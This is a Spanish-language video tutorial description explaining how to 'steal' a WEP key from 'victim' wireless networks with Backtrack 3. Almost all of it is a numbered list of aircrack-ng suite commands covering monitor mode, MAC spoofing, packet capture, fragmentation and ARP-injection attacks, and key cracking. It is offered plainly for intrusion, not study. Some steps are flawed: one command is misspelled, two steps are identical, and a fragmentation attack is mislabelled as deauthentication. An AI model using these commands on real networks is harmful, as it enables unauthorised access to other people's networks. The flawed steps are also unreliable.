Tutorial Backtrack 3En este video les enseño a como robar una clave WEP con Backtrack 3 En este caso usare una tarjeta: D'Link DWA-110 que tiene chipset Ralink, por lo tanto me basaré en ella y su interface tiene el nombre rausb0 (rausb0, puede ser la interface de tu adaptador ej; wlan0 Comandos: 1: Ver tarjetas Wi-Fi conectadas al PC airmon-ng 2: Parar modo monitor existente airmon-ng stop rausb0 3: Poner la tarjeta en modo "down" ifconfig rausb0 down 4: Cambiar la MAC de nuestro adaptador Wi-Fi macchanger -m 00:11:22:33:44:55 rausb0 5: Volver a poner la tarjeta en modo monitor airmo-ng start rausb0 6: Buscar redes víctimas y anotar sus datos airodump-ng rausb0 7: Capturar "DATA" airodump-ng -c "Canal de la víctima" -w pruebas rausb0 EJ: airodump-ng -c 6 -w pruebas rausb0 8: Desautenticar la red, para poder empezar a agilizar la captura aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0 EJ: aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0 9: Segundo paso de agilización de captura aireplay-ng -5 -b "MAC de la víctima" -h 00:11:22:33:44:55 rausb0 EJ: aireplay-ng -5 -b 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 rausb0 10: Segundo paso de agilización packetforge-ng -0 -a "Mac víctima" -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y "Archivo .xor" ARP rausb0 EJ: packetforge-ng -0 -a 00:40:F4:FE:9A:E9 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragmentXXXXXXX-XXX.xor ARP rausb0 Nota: el archivo .xor será diferente 11: Tercer paso de agilización aireplay-ng -2 -r ARP rausb0 12: Crackear red aircrack-ng pruebas-01.cap Y listo, tienes la clave WEP :) code pour embarquer la vidéo : >>> http://www.youtube.com/embed/nSUwvxRSCos <<< |